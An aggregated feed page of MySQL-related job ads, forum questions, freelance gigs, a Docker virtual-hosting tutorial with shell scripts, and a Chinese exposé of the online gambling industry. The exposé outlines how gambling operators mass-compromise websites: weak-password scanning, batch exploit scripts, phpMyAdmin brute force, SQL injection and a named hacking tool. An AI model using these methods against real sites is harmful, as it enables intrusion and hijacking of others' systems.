PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MySQL/PHP programmeur      Cache   Translate Page      
Algemeen: Wij zijn een energie advies bureau en hebben o.a. een energie monitoring website voor bedrijven. Voor het vernieuwen van deze website zijn wij op zoek naar een goede MySQL/PHP programmeur die met ons mee kan denken. Werkzaamheden: - Vernieuwen van oude database door een nieuwe database (MySQL)...
          binlog incomplete.Missing some databases's record (no replies)      Cache   Translate Page      
in mysql-audit.log ,we found some records about c_bet.but we couldn't find any record that contain "c_bet" in every each of binlog files.
Could any one help me with this ? I cloudn't find any clue on the internet.
post a message here is my last hope...

here is my.cnf:
[mysqld]
symbolic-links=0
innodb_buffer_pool_size=4G
key_buffer_size=1G
max_connections=3000
max_connect_errors=100
expire_logs_days=30
log-bin = /binlog/mysql-bin
skip-name-resolve
basedir=/usr/local/mysql
datadir=/mysql/data
port = 3306
server_id=117
socket=/tmp/mysql.sock
sql_mode=""
# mysql-audit
plugin-load=AUDIT=libaudit_plugin.so
audit_validate_checksum=ON
audit_json_file=ON
audit_uninstall_plugin=ON
audit_offsets=7800, 7848, 3624, 4776, 456, 360, 0, 32, 64, 160, 536, 7964
#审计日志文件绝对路径
audit_json_log_file=/tmp/mysql-audit-3306.log
#需要审计的命令
audit_record_cmds= drop,alter,update,delete,insert
[mysql]
socket=/tmp/mysql.sock


this is the master ,and on the slave,I run the "show slave status \G;" command,it shows the master-slave replication is ok.

really appreciate if you could help
          Sluggish replication; Linux Kernel 4.15.0-36 (1 reply)      Cache   Translate Page      
OS: Ubuntu 16.04.03 x64
MySQL: 5.7.23-community (MySQL ppa repo)

Anyone else running Ubuntu 16.04.3 with kernel 4.15.0-36-generic and having sluggish replication performance?

We have a MySQL farm of seven severs, all running Ubuntu on dedicated hardware. Ubuntu released kernel 4.15.0-36-generic last week and we rebooted this last weekend. Replication has been falling steadily behind since the reboot. There was no reason for it that we could see. The servers were not choaking under any load; network, storage, or CPU. Servers on the same network switch were up to hours behind in replication. This was something new. We have never really had a significant lag before - usually a minute or so was the worst we ever had. But hours?

There were no MySQL or OS configurations changes. All servers were updated to MySQL 5.7.23 on 2018-08-08 and have been running fine since that update.

The biggest indicator of the lag was "SLAVE RETRIEVED". It was way behind. "SLAVE EXECUTED" was keeping up but "SLAVE RETRIEVED" seem to not be downloading transactions from the upstream host with any urgency.

Long story short, we eliminated the physical network and concluded it had to be an OS update. We restarted one server using kernel 4.15.0-34-generic and the server caught up replication in just a couple of minutes!
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Junior Web Developer - Chalandri      Cache   Translate Page      
Intelligent Media, a media technologies company based at Chalandri - Athens, is seeking for a full-time female Junior Web Developer for its idcs (idcs.gr) Business Unit. Job Description: Handling of first- and second level support for an online loyalty club platform developed and operated on behalf of a multinational company Participation in various web development projects Job Requirements: Knowledge and proven work experience (at least 1 year of experience), focused on PHP Programming and HTML5, CSS3, JavaScript, AJAX/JSON, MySQL/MariaDB Experienced in CMS development...
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          ODOO v11.0 - Need to select "allow Reconciliation" for all accounts with existing posted entries - with force re computation of amount_residual      Cache   Translate Page      
I have posted entries in our Odoo ERP - did not set the "allow reconciliation" to True before posting entries. Need to set all accounts to "allow reconciliation" so that i can reconcile all with the Bank... (Budget: $10 - $30 USD, Jobs: ERP, MySQL, PHP, Python, Software Architecture)
          Database import and uploading of a site      Cache   Translate Page      
Database import and uploading of a site the first mission is simple and to import a very large database in mysql + 7 gigas and after activating the site (the data is already transmitted on the FTP) and... (Budget: $30 - $250 USD, Jobs: Database Administration, Database Programming, HTML, MySQL, PHP)
          hi need POS billing software ASAP may be you can use floreant POS or any technology but need ASAP      Cache   Translate Page      
hi need POS billing software ASAP maybe you can use floreant POS or any technology but need ASAP I need POS billing software if u using Floreant POS then its fine els you using something other billing software then I need UI of floreant and print design I also send u I need like that... (Budget: ₹1500 - ₹12500 INR, Jobs: .NET, C# Programming, MySQL, PHP, Software Architecture)
          Build a Website with Database Connectivity      Cache   Translate Page      
I need to build a website from scratch... It should have 3 type of Login Portals. Please only apply if you have knowledge about Database connectivity, Conditional forwarding, Java scripts and front end designing... (Budget: ₹1500 - ₹12500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Corrección de código para consulta MySql      Cache   Translate Page      
Hola, Estoy creando una consulta desde una... - Fuente: www.forosdelweb.com
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          aws Engineer|6-9 years|Hyderabad - Capgemini - Hyderabad, Telangana      Cache   Translate Page      
Experience with SQL and NoSQL DBs such as SQL, MySQL, Amazon DynamoDB. Hiring AWS Engineer with Certification and Solution Architect experience....
From Capgemini - Wed, 26 Sep 2018 05:22:40 GMT - View all Hyderabad, Telangana jobs
          Need Codeigniter Developer at 1k/day urgently      Cache   Translate Page      
Need Codeigniter Developer at 1k/day urgently (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Create a view for a custom post type in WordPress      Cache   Translate Page      
I am using cptui plugin and have create a post type and have some custom fields in it. I need that content to be displayed in this layout on the front end https://www.globalservants.org/index.php/ministries/radio... (Budget: $10 - $30 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Write JAVA wrapper for ERC20 integration      Cache   Translate Page      
The wrapper has to be generic, DB based. Where we can add required fields and configurations to integrate new ERC20 tokens in future. For now, TUSD integration is to be done by the freelancer. You'll get support from in-house tech team guiding about the architecture... (Budget: $30 - $250 USD, Jobs: Ethereum, Java, Javascript, MySQL, Software Architecture)
          core php developer      Cache   Translate Page      
core php developer needed full time (Budget: $750 - $1500 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          Need Codeigniter Developer at 1k/day urgently      Cache   Translate Page      
Need Codeigniter Developer at 1k/day urgently (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Create a view for a custom post type in WordPress      Cache   Translate Page      
I am using cptui plugin and have create a post type and have some custom fields in it. I need that content to be displayed in this layout on the front end https://www.globalservants.org/index.php/ministries/radio... (Budget: $10 - $30 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Write JAVA wrapper for ERC20 integration      Cache   Translate Page      
The wrapper has to be generic, DB based. Where we can add required fields and configurations to integrate new ERC20 tokens in future. For now, TUSD integration is to be done by the freelancer. You'll get support from in-house tech team guiding about the architecture... (Budget: $30 - $250 USD, Jobs: Ethereum, Java, Javascript, MySQL, Software Architecture)
          core php developer      Cache   Translate Page      
core php developer needed full time (Budget: $750 - $1500 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Desarrollador Web - PCA Ingenieria - Palmira, Valle del Cauca      Cache   Translate Page      
Se busca desarrollador web, experiencia trabajando con PHP, MySQL, CSS y Javascript. Ideal que haya trabajado con algún framework PHP, XML, json, API REST....
De PCA Ingenieria - Sat, 22 Sep 2018 16:32:33 GMT - Ver todos: empleos en Palmira, Valle del Cauca
          PHP or Node.js Development      Cache   Translate Page      
Web1Experts - Mohali, Punjab - Chandigarh - Looking for experience PHP or Node.js developer having at least 1+ year of experience, expert in API's development, MongoDB & MySQL.... Experience with PHP 2 to 5 years Experience with Node.js 1 to 4 years Responsibilities and Duties API development with Node.js, MongoDB/MySQL...
          PHP Developer      Cache   Translate Page      
Property Megamart realty pvt ltd. - Mumbai, Maharashtra - Minimum Experience of 6 Months - 1 years Positions 1 Required Skills Knowledge of PHP 5 ( Object Oriented Programming) & MYSQL...
          Needexperienced PHP developers      Cache   Translate Page      
Technokrats. - Kolkata, West Bengal - Job Description Position: SR. PHP DEVELOPER Job Type:Full Time, Permanent. Experience:Min 1 yrs Skill:Sound in algorithm Core or Custom... Development in either of PHP, MySQL, JavaScript, AJAX And/or Knowing different other technologies like OPPs, MVC, CI, Zend, Yii And/or Sound in CMF...
          PHP and Wordpress Developer      Cache   Translate Page      
APPTech Mobile Solution - Indore, Madhya Pradesh - and extending WordPress plugins. Must have experience of PHP/MySQL development. Must have very good experience in HTML 5, CSS, jQuery& AJAX... knowledge of IT skills. Must be proficient in PHP, MySQL, CSS, HTML, Cake php, custom php. CMS : WordPress Responsibilities and Duties Website...
          PHP Developer      Cache   Translate Page      
GB Mainframe LLP - Kerala - Desired Experience: JavaScript, MySQL, REST, AJAX, PHP, HTML5 Responsibilities and Duties * 1 - 2 years of strong hands-on experience... on live projects with Core PHP, MySQl, JQuery & AJAX. * Should have fair knowledge in database structure and designing. * Should have fair...
          互联网毒瘤之网络博彩行业调查报告(上)      Cache   Translate Page      

什么是网络博彩

什么是网络博彩呢,其实就是一种新型的通过网络进行赌博,目前的网络博彩类型繁多(例如赌球赌马骰宝轮盘网上百家乐等),而现场操作比较复杂的方式就相对较少(例如扎金花、拉耗子等)。特点,其中目前网络最火的平台分别有,太阳城集团、威尼斯集团、捕鱼平台、大发彩票等等。在这里我向大家介绍目前主流的博彩行业内幕。

image

image

某个网络博彩公司运营架构图:

图中是某个博彩公司的运营架构图,我们可以直接看出,一个成熟的博彩平台是由多个产业链参与并聚集而来,技术开发、线上客服、线下推广代理等多种职能人员,并且重视网站和APP的安全,从主机安全到业务安全中的风控都已在博彩中得到应用且实现,核心团队一般都在境外,东南亚地区居多,博彩团队麻雀虽小五脏俱全,这个行业已形成规模化、集团化、分工细分化等特点。

image

主流的博彩第三方平台开发公司

这个行业由于比较特殊,所以博彩一般分为两部分,开发与运营一般是相互分开,相互独立的,开发公司只负责开发相应的系统,这样的公司可能是国内正规注册的公司,也可能是在境外的,不过境外一般是居多。

这是专门开发博彩软件系统playtech平台(境外):

image

还有向博彩平台提供技术支持的BBIN宝盈集团(境外):

image

开发与搭建一起的大发云(地区未知):

image

一个比较有实力,并提供在线赌场软件的平台 Microgaming:(境外)

image

常用的推广方式(广告推广、流量劫持、DNS 劫持、QQ 群与微信群传播、线上代理推广)

同一个网站配置多个域名

赌博性质的网站,安全软件通常会给出防毒警告,很大程序的影响了用户体验性。

image

博彩运营人员为了防止出现防毒警告,通常会连续购买多个不同的域名,下图是某博彩从业人员一个域名后台管理系统,一个网站可配置上百个域名进行解释,所有的域名都指向同一ip服务器。

image

image

建立色情网站引流

建立色情网站是这做行保持持久流量的一个重要来源,而这类网站主要是针对目前的青年男性朋友,这类网站为了保持流量,其中的图片、视频等资源也会找第三方经常更新。

image

网站中充满了大量关于博彩的动态图片与链接,用户随便一点就可能进入到一个博彩网站中。

为了尽可能的逃避网安监管,这类网站的域名也会经常的更换。

image

第三方论坛广告

在论坛做广告,这是及为常见的方式,博彩广告主要分布在网赚类论坛,小说论坛,卡商类论坛。

image

image

在这些论坛中,每个论坛的广告位价格,都不一样,主要是按论坛的权重来计算广告位的价格。

名词解释:权重

网站的权重是指网站在搜索引擎当中所占的高低,可以简单理解,权重越高的论坛,带的流量会更高排名也就更高。

这些广告基本上都是靠$砸出来的。下图是某权重为4的广告论坛广告价位表。

image

iMessage群发广告

iMessage代发组织。iMessage代发其实并不违法,但是一般的项目需求量很小,很难走量,利润低。而菠菜(博彩黑话)、微商、A货、信用卡,贷款等需求就很多,其中以博彩为最大。

image

当前,包括淘宝在内,目前行情价格是8分钱,起步1万,10万以上有折扣。而从淘宝某店家得知,Magiccc遇到的最新版本,直接可以通过短信下载APP的形式,目前还未普及。主要原因并不是技术方面,还是成本考虑,除了博彩公司,一般小打小闹的工作室做不了……

如果把线上博彩比作恶魔,那么iMessage代发中做博彩生意的,就是恶魔的使者。而Magiccc最后,准备会会这群恶魔…… 。

建立彩票计划

是什么是计划,其实就是告诉你,怎么样买,可以让你稳赚不亏,跟着预先设定好的计划进行购买。还专门开发了自动帮你计算投注计划的软件,这其中会一小部分人尝到甜头,但大部分人最后都是输的血本无归。

该软件会给出往期彩票开奖号,提供自动投注功能,只需要登上账号,然后开启自动投注功能,这个软件就可以自动的去投注彩票。直到把你账号的余额给投注完才会罢休。

image

其中一个倍投计划的介绍,意思就是:第一次买不中,第二次就买双倍,第二次买不中,第三次就买三倍,以此类推,直到中奖。一旦中奖之前所亏的,就会全部赢回来。但大部分人最后都是输的血本无归。

image

建立QQ群,论坛广告,自媒体推广等,免费发放彩票计划软件,其中的神圣计划,宝宝计划是目前最为火热。

image

image

美女利用人性弱点进行吸引流量,深入挖掘

除了主流的网络推广之外,这些博彩从业人员对人性的弱点也是非常了解,通过黑灰产非法购买公民用户资料,分析有一定经济实力的人群,进行深入挖掘,主要以男生作为目标。

http://imgsrc.baidu.com/forum/w%3D580/sign=05b4a76832d3d539c13d0fcb0a86e927/b5fcd158ccbf6c814c54ab7eb83eb13532fa4047.jpg

他们会加你QQ,微信等社交软件,刚开始只是与你普普通通的聊天。你并不会感觉有什么异样。

http://imgsrc.baidu.com/forum/w%3D580/sign=33583ea7a58b87d65042ab1737092860/7a3dfbf2b2119313303a732661380cd790238dad.jpg

他们会主动与男性聊天,无话不谈,聊的时间久了,你们之间会产生一些感情了。

http://imgsrc.baidu.com/forum/w%3D580/sign=d4c125589d25bc312b5d01906ede8de7/265a42a7d933c895287768edd51373f08302009d.jpg

等差不多的时候,就会露出马脚了,开始以各种方式,让你进行游戏,充值,比如:充值成功后并答应做你女朋友。你不会以为自己走桃花运了吧,但往往也是输得倾家荡产后,美女也不见了。

http://imgsrc.baidu.com/forum/w%3D580/sign=565ae57cd700baa1ba2c47b37711b9b1/a2aab31c8701a18b4eb13adf982f07082938fe42.jpg

可以参考:https://baijiahao.baidu.com/s?id=1579138638503696287&wfr=spider&for=pc

你不会就以为真的是美女在陪你聊吧,其实背后可能是这样。

image

入侵国内网站,放置暗链、流量劫持

为了快速上排行,引流,往往会高价招聘渗透、黑客等相关人才到境外工作,在境外来入侵国内正规合法网站,受害网站主要为:政府网站、学校网站和中小型企业网站为主

image

image

国内某VPS服务器网站被插入暗链。

image

往往都是通过工具来非法入侵,获取网站控制权限。

目前主流批量化获取网站控制权通常有以下方法

  • 批量扫描弱口令(ssh,ftp,mysql,mssql,mongodb,rdp)等服务
  • 批量扫描备份文件
  • 批量利用最新安全漏洞exp脚本批量获取网站控制权限
  • 批量phpmyadmin爆力破解
  • 批量nginx/iis解析漏洞
  • 批量sql注入,提权漏洞,git漏洞

这些功能已被集成到一个叫Black Spider软件中,在黑市上被卖到2000,黑产利用这些工具一天可获取几百到上千个网站的控制权限。

image

image

第三方黑吃黑也随之兴起

入侵同行网站

入侵网站只有两个目的。

第一个目的就是获取同行网站的会员数据,拿回来的数据可以自己二次转化利用image

另外一个目的就是获取同行网站服务器权限,做流量劫持,修改同行网站代码,跳转到自己网站下,这早已是这个行业黑吃黑的普遍现象了。

image

image

修改同行网站数据

这种黑吃黑项目已逐渐的火热起来。但是技术成本还是比较高,在博彩中他们一样重视安全性。

image

image

博彩运营公司地区分布

在对网络博彩客服人员进行了多次钓鱼攻击发现,他们大部分ip来自境外,其中部分可能为代理ip,由于博彩业在菲律宾是合法产业,只要是符合法律规定注册的,都可以经营,所以许多公司都将网站后台服务及财务及运营点。

东南亚地区成为网络博彩团队的主要据点。 image

后台赢利率是可控的

其中一个博彩后台系统,赢利率,玩法都是后台人员可控制的。

image

这个博彩平台的会员注册人数已经上万,流水惊人。image

搭建一个平台需要的花费

这是专门搭建博彩网站公司客户人员。

image

我们了解过多个平台搭建费用,目前搭建一个博彩网站大概费用在2万元~5万元左右,后期每个月的安全维护费用在1.5万元左右,这还没有算上后期运营的人工成本,推广成本,公司成本,等等因素。要想踏入这个行业,深不可测。如果没有一定的经验,资金与团队是很难做下来的。

重新回顾下某某博彩运营架构图吧

image

 

同学们也可以参考以下链接:

http://www.freebuf.com/articles/network/175062.html

http://www.freebuf.com/news/topnews/167829.html

 

写在最后

随着黑灰产的快速崛起,我们能看到的只是互联网黑产的冰山一角,博彩也算是联互网黑产中的一小部分而已,简单的几篇文章是无法讲清楚其中的内幕,大的博彩平台后面基本都有背景与靠山来维持,十赌九输是必然会发生的事情,不能抱有侥幸的心理,远离网络赌博,远离网络黑产,只有这样我们才是最大的赢家。


          使用 Docker 构建安全的虚拟空间      Cache   Translate Page      

*本文作者:Li4n06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

最近上的某水课的作业是出 ctf web题目,然而大多数同学连 php 都没学过,(滑稽)更别说配置服务器了,于是我想能不能趁机赚一波外快 造福一下同学,(其实就是想折腾了)。所以打算把我自己的 vps 分成虚拟空间给大家用。但是一般的虚拟空间安全性难以得到保证,一个空间出问题,其他的用户可能都跟着遭殃,也就是旁站攻击。更何况我们这个虚拟空间的用处是 ctf web 题目,总不能让人做出一道题目就能顺手拿到所有题目的 flag 吧。于是想到了使用 docker 来构建安全的虚拟空间,其间遇到了不少问题,下面就是折腾的过程了。

image

实现思路

大体的思路是,在我的 vps 上为每个用户创建一个文件目录,然后将目录挂载到 docker 容器的默认网站目录,也就是/var/www/html,,用户可以通过 FTP 将网站源码上传到自己的文件目录,文件也会同步到容器内。这样就实现了各个空间的环境隔离,避免旁站攻击。

而数据库则可以单独构建一个 mysql 容器,为每个用户分配一个 user&database,让用户和空间容器来远程连接。

前期准备

选择镜像:

空间使用的镜像为:mattrayner/lamp:latest-1604(ubuntu 16.04 + apachd2 + mysql,其实只要有mysql-client 就可以了)

数据库所使用的镜像为:mysql:5(mysql 官方镜像)

配置FTP:

和配置常规的 FTP 没什么区别,这里特别强调3点:

一定要开启 ch_root,防止不同用户之间可以互相查看文件;

如果使用被动模式,那么 云主机的安全组 或者iptables 不要忘了放行端口;

将 umask 设置为 022 (保证用户上传的文件默认权限为755。

选择一个位置存放用户文件夹:

我这里新建一个 ~/rooms/ 来存放用户的文件夹。

配置数据库

1. 网络:

要让虚拟空间的容器能够远程连接数据库,首先要使容器之间在一个网段,那么我们就需要设置一个桥接模式的 docker network,我这里使用 172.22.0.0/16 这个网段。

$ docker network create --driver = bridge --subnet = 172 .22.0.0/16 room_net

2.创建 MySQL 容器:

我们的数据库需要满足:

允许用户远程连接;

允许空间容器连接。

第一点要求,我们通过将数据库容器的 3306 端口映射到 VPS 的开放端口即可,我这里映射到 3307。

第二点要求,只要通过我们刚刚设置的 docker network 即可实现。

所以启动创建容器的命令是的命令是:

$ docker run -d --name room-mysql --network room_net --ip 172 .22.0.1 -p 3307 :3306 -e MYSQL_ROOT_PASSWORD = your_password mysql:5

值得注意的一点是,root 用户是不需要远程登录的,出于安全考虑,我们应该 禁止其通过localhost意外的host登录

执行:

$ docker exec -it room-mysql /bin/bash -c "mysql -u root -p -e\"use mysql;update user set host='localhost' where user='root';drop user where user='root' and host='%';flush privileges;\""

创建空间过程

做好前期的准备工作,我们就可以开始构建空间了,出于方便我们将整个过程编写成 shell 脚本,这样以后要新建空间的时候,只需要运行一下就可以了。

我们创建空间需要以下几个步骤:

1. 创建新的 FTP 用户

这个用户应该满足这样的要求:

可以上传文件到虚拟空间用户文件夹 (废话);

不能访问除虚拟空间用户文件夹之外的位置 (在配置 FTP 时通过ch_root 实现);

创建的时候设置一个随机密码;

不能通过 ssh 登陆 (其实这也是用户能通过 ftp 连接 的必须条件。如果不限制的话,ftp登录时会出现 530 错误。

那么对应的 shell 脚本就是:

#/home/ubuntu/rooms/ 即你的vps上用来存放用户文件夹的位置  # $1 参数为要设置的用户名,也是虚拟空间容器&数据库用户&数据库&用户文件夹的名字useradd -g ftp -d /home/ubuntu/rooms/$1 -m $1 pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`  #生成随即密码echo $1:$pass | chpasswd                                    #为用户设置密码#限制用户通过 ssh 登录(如/etc/shells 里没有/usr/sbin/nologin 需要自己加进去usermod -s /usr/sbin/nologin $1             echo "create ftp user:$1 indentified by $pass"              #输出用户名和密码

2. 新建数据库用户&数据库,并为用户赋权

这部分操作比较简单,我们就只需要为用户新建一个 MySQL 账户和一个专属数据库就好了。

shell 脚本:

# 让用户输入 mysql 容器的 root 密码read -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass# 创建数据库docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"create database $1;\""# 生成密码pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`# 创建 MySQL 用户docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"CREATE USER '$1'@'%' IDENTIFIED BY '$pass';\""# 为用户赋予权限docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"grant all privileges on $1.* to '$1'@'%';flush privileges;\""# 输出账户信息echo "create database user:$1@'%' indentified by $pass"

3. 新建空间

到现在我们已经可以创建空间容器了,想一想这个空间要满足什么基本要求呢?

能够外网访问;

能够连接数据库;

挂载用户文件夹内的文件到网站根目录。

那么命令就是:

$ docker run -d --name $1 --network room_net -p $2 :80 -v /home/ubuntu/rooms/$1 /www:/var/www/html mattrayner/lamp:latest-1604

但是作为一个用做虚拟空间的容器,我们还需要考虑 内存 的问题,如果不加限制,docker默认使用的最大内存就是 VPS 本身的内存,很容易被人恶意耗尽主机资源。

所以我们还要限制一下容器的最大使用内存。

关于 docker 容器内存使用的有趣的现象:

在最初,我把容器的内存限制到了 128m,然后访问网站发现 apache 服务没有正常启动,于是我把内存限制上调到了 256m,然后执行 docker stats 发现容器内存使用率接近100%;

有趣的是,当我尝试限制内存为 128m ,然后手动开启 apache 服务时,发现服务完全可以被正常启动,查看内存占用率,发现只占用了 30m 左右的内存。

为什么会出现这种情况呢?我大概猜想是因为容器内还有一些其他服务,当限制内存小于 256m 的时候,这些服务无法被同时启用,但是我们可以只启用 apache 啊!

于是命令变成了下面这样:

docker run -d --name $1 --cpus 0 .25 -m 64m --network room_net -p $2 :80 -v /home/ubuntu/rooms/$1 /www:/var/www/html mattrayner/lamp:latest-1604 docker exec -it $1 /bin/bash -c "service apach2 start;"

最后一步,修改挂载文件夹的所有者:

到这时,理论上我们的空间已经可以正常使用了,可是我用 FTP 连接上去发现,并没有权限上传文件。

经过漫长的 debug 后发现,在容器启动一段时间后,我们挂载到容器内部的文件夹的所有者发生了改变,于是我查看了容器内部的 run.sh 脚本,发现了这样的内容:

if [ -n "$VAGRANT_OSX_MODE" ];then    usermod -u $DOCKER_USER_ID www-data    groupmod -g $(($DOCKER_USER_GID + 10000)) $(getent group $DOCKER_USER_GID | cut -d: -f1)    groupmod -g ${DOCKER_USER_GID} staff    chmod -R 770 /var/lib/mysql    chmod -R 770 /var/run/mysqld    chown -R www-data:staff /var/lib/mysql    chown -R www-data:staff /var/run/mysqldelse    # Tweaks to give Apache/PHP write permissions to the app    chown -R www-data:staff /var/www    chown -R www-data:staff /app    chown -R www-data:staff /var/lib/mysql    chown -R www-data:staff /var/run/mysqld    chmod -R 770 /var/lib/mysql    chmod -R 770 /var/run/mysqldfi

可以看到,当没有设置 $VAGRANT_OSX_MODE 这个环境变量时,容器会修改 /app(/var/www/html 的软链接)文件夹的所有者为 www-data ,那么我们就需要在启动容器时,设置这个环境变量值为真。

而 /app 文件夹 的默认所有者是 root 用户,我们将本地文件夹挂载到容器内的/app,后,本地文件夹的所有者也会变为 root 。所以我们还需要修改本地文件夹的所有者。

于是创建容器的 shell 脚本又变成了:

# 启动容器docker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -eVAGRANT_OSX_MODE=1 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604# 启动apache2docker exec -it $1 /bin/bash -c "service apache2 start;"# 修改挂载文件夹的所有者chown $1:ftp -R /home/ubuntu/rooms/$1/www

最后的脚本:

到现在创建空间的过程就结束了,那么贴上最后的脚本

创建空间脚本:

#!/bin/bash# The shell to create new room# Last modified by Li4n0 on 2018.9.25# Usage: #   option 1: database/dbuser/room/ftpuser/ name#   option 2: port# create new ftp useruseradd -g ftp -d /home/ubuntu/rooms/$1 -m $1pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`echo $1:$pass | chpasswdusermod -s /usr/sbin/nologin $1echo "create ftp user:$1 indentified by $pass"# create new databaseread -sp "请输入 MySQL 容器的 root 账户密码:" mysql_passdocker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"create database $1;\""pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"CREATE USER '$1'@'%' IDENTIFIED BY '$pass';\""docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"grant all privileges on $1.* to '$1'@'%';flush privileges;\""echo "create database user:$1@'%' indentified by $pass"#create new roomdocker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -eVAGRANT_OSX_MODE=1 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604docker exec -it $1 /bin/bash -c "service apache2 start;"chown $1:ftp -R /home/ubuntu/rooms/$1/www

删除空间脚本:

#!/bin/bashread -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass#drop the databasedocker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"drop database $1\""#delete dbuserdocker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"use mysql;drop user '$1'@'%';flush privileges;\""#delete the containerdocker stop $1docker rm $1#delete ftp useruserdel $1rm -rf /home/ubuntu/rooms/$1

用法:

# 创建sudo create_room.sh room1 10080  # 用户名 映射到 VPS 的端口# 删除sudo del_room.sh room1

总结

到这里我们就实现通过 docker 搭建较安全的虚拟空间了,当然,如果真的想上线运营,还有很多需要完善的地方,比如 空间大小的限制、用户文件和数据库的定时备份等等,有兴趣的朋友可以去自己完善。

那么到这里我的折腾就结束了,现在去卖空间给同学发福利了!

*本文作者:Li4n06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

image


          测试金字塔实战 - 开发者头条      Cache   Translate Page      

“测试金字塔”是一个比喻,它告诉我们要把软件测试按照不同粒度来分组。它也告诉我们每个组应该有多少测试。虽然测试金字塔的概念已经存在了一段时间,但一些团队仍然很难正确将它投入实践。本文重新审视“测试金字塔”最初的概念,并展示如何将其付诸实践。本文将告诉你应该在金字塔的不同层次上寻找何种类型的测试,如何实现这些测试。

2018 年 2 月 26 日 作者:Ham Vocke

Ham 是德国 ThoughtWorks 的一名软件开发和咨询师。由于厌倦了在凌晨 3 点手动部署软件,他开始持续交付实践,加紧自动化步伐,并着手帮助团队高效可靠地交付高质量软件。这样他就可以把省出来的时间用在别的有趣的事情上了。

目录
  • 测试自动化的重要性
  • 测试金字塔
  • 我们用到的工具和库
  • 应用例子
    • 功能
    • 整体架构
    • 内部架构
  • 单元测试
    • 什么是单元?
    • 社交和独处
    • 模拟和打桩
    • 测试什么?
    • 测试架构
    • 实现一个单元测试
  • 集成测试
    • 数据库集成\
    • REST API 集成
    • 几个独立服务的集成
    • JSON 的解析和撰写
  • 契约测试
    • 消费者测试(我们团队)
    • 提供者测试(其他团队)
    • 提供者测试(我们团队)
  • UI 测试
  • 端到端测试
    • 用户界面端到端测试
    • REST API 端到端测试
  • 验收测试 – 你的功能工作正常吗?
  • 探索测试
  • 测试术语误解
  • 把测试放到部署流水线
  • 避免测试重复
  • 整洁测试代码
  • 结论

